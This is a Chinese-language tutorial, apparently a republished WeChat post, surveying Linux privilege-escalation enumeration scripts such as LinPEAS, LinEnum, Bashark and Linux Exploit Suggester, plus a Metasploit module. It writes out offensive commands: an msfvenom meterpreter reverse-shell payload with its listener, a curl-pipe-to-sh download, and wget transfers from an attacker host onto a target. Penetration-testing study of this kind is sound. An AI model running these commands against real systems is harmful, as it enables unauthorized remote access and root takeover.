声明
本文仅供学习参考,请勿用作违法用途,否则后果自负
介绍
Linux
操作系统的shell
时,会将其转换为TTY shell
(可以理解为完全交互式的shell)或转成meterperter
会话,此时的shell
可以执行的操作有线,因此,我们需要找到可以提权的文件,目录,权限,日志和/etc/passwd
文件,Linux
中文件的数量时非庞大的,因此,手动排查时非常消耗时间的,如果有脚本可以完成,岂不是非常舒服。权限提升搜集
-
内核,操作系统版本,设备信息
-
任何已安装或正在运行的易受攻击的软件包
-
具有完全控制或修改访问权限的文件或文件夹
-
映射驱动器
-
日志文件
-
网络信息
-
防火墙状态和规则
-
运行过程
-
存储的凭证
-
sudo
-
Docker
-
路径变量
-
缓冲区溢出条件
-
计划任务
获取一个shell
-p
指定加载的payload,根据具体情况而定msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
metasploit
,-q
命令是静默启动,msfconsole -q
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost ip
set lport port
exploit
脚本介绍
本次主要介绍的脚本有:LinPeAS 、LinEnum、Bashark、Linux-Exploit-Suggester、LinuxPrivChecker、Metasploit、Linux Private-i、Linux Smart Enumeration、Linux-Exploit-Suggester 2。
LinPeAS
GitHub链接:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
工具LinPeAS在默认情况下是被动收集信息的,不会向磁盘写入内容,也不会尝试通过su命令以其他用户身份登录,可以放心在目标主机运行。
LinPeAS在缺省情况下,需要大概2-10分钟时间才能完成(取决于请求的检查次数),如果在CTF中使用此工具,建议开启-a参数,这将进行所有检查。
参数介绍:
- -a (所有检查):进程检查,su top2000 密码暴力破解。
- -s (超快和隐身):绕过一些耗时的检查,并不会留下任何痕迹。
- -P (密码):传递将与 sudo -l和Bruteforcing其他用户一起使用的密码
- -h :帮助
- -o :仅执行选定的检查、
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
root
模式 直接就提示YOU ARE ALREADY ROOT!!!
攻击者计算机
sudo python -m SimpleHTTPServer 80
目标主机
wget ip/linpeas.sh
chmod 777 linpeas.sh
./linpeas.sh
LinEnum
GitHub链接:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
LinEnum
是一个shell
脚本,其工作原理是从目标计算机提取有关提升特权的信息,支持实验报告工具,可以导出可读格式的扫描结果。用法
-
示例:./LinEnum.sh -s -k关键字-r report -e / tmp / -t
命令
-
-k输入关键字
-
-e输入导出位置
-
-t包括详尽的(冗长的)测试
-
-s提供当前用户密码以检查sudo权限(不安全)
-
-r输入报告名称
-
-h显示此帮助文本
LinEnum执行的检查/任务的高级摘要:
内核和发行版本的详细信息
系统信息
用户信息
特权访问
环境
工作/任务
服务
版本信息
默认/弱凭证
搜索:
特定于平台/软件的测试:
Bashark
GitHub链接:https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh
wget
命令下载了Bashark
,该命令在攻击者计算机上本地托管。然后使用chmod
提供执行权限,然后运行Bashark
脚本。它将提升您的Shell
,使其能够执行不同的命令。cd /tmp
wget ip/bashark.sh
chmod 777 bashark.sh
source bashark.sh
getperm -c
getconf
LES: Linux特权升级审核工具
快速下载:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod 777 les.sh
./les.sh
LinuxPrivChecker
GitHub Link: https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
LInux
系统上运行的python
的脚本,以枚举基本系统信息
并搜索通用提权方法。他支持搜索可写文件,错误配置、明文密码和适用的利用。还提供一些可能存在提权的路径,这些都可以在提升特权的同时发挥关键作用,它从基本系统信息开始:内核版本,主机名,操作系统,网络信息,运行服务等。安装命令
pip install linuxprivchecker
python3 -m linuxprivchecker -w -o linuxprivchecker.log
Metasploit: Local_Exploit_Suggester
Metasploit
的一个模块,可以用于检查与其他脚本一样提升特权的方法,它所需要的只是在被利用目标上运行的会话标识符号。它将列出系统易受攻击的各种漏洞。use post/multi/recon/local_exploit_suggester
set session 2
exploit
kali
中自带,可以直接启动。上面的命令需要先获取一个session
。Linux Private-i
GitHub链接:https://raw.githubusercontent.com/rtcrowley/linux-private-i/master/private-i.sh
Linux Private-i
是一个Linux
枚举和特权升级工具,该工具可以自动执行基本枚举步骤,并以易于阅读的格式显示结果。脚本有四个选项,包括全面检查、基本信息输出、运行基本的生命周期检查,工具使用
chmod 777 private-i.sh
./privcate-i.sh
/etc/passwd
为可写,Linux Smart Enumeration
GitHub 链接: https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
linux-smart-enumeration
项目来自我们上面提到的LinEnum
,脚本用于渗透测试和CTF的Linux提权枚举工具,工具的作用与其他脚本相同,它具有3个级别的详细信息,因此您可以控制看到的信息量。使用绿色来标识可能存在提权向量。工具使用
chmod 777 lse.sh
./lse.sh
/etc/passwd
Linux Exploit Suggester 2
GitHub Link: https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
LES
的基础上做了很大的改进,包括更多的漏洞利用,可以直接从Exploit DB 下载漏洞利用代码,精准的匹配,它扩大了可搜索漏洞的范围,更利用查看的颜色。工具使用
chmod 777 linux-exploit-suggester-2.pl
./linux-exploit-suggester-2.pl
总结
原文始发于微信公众号(想走安全的小白):LInux 权限提升--脚本篇
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论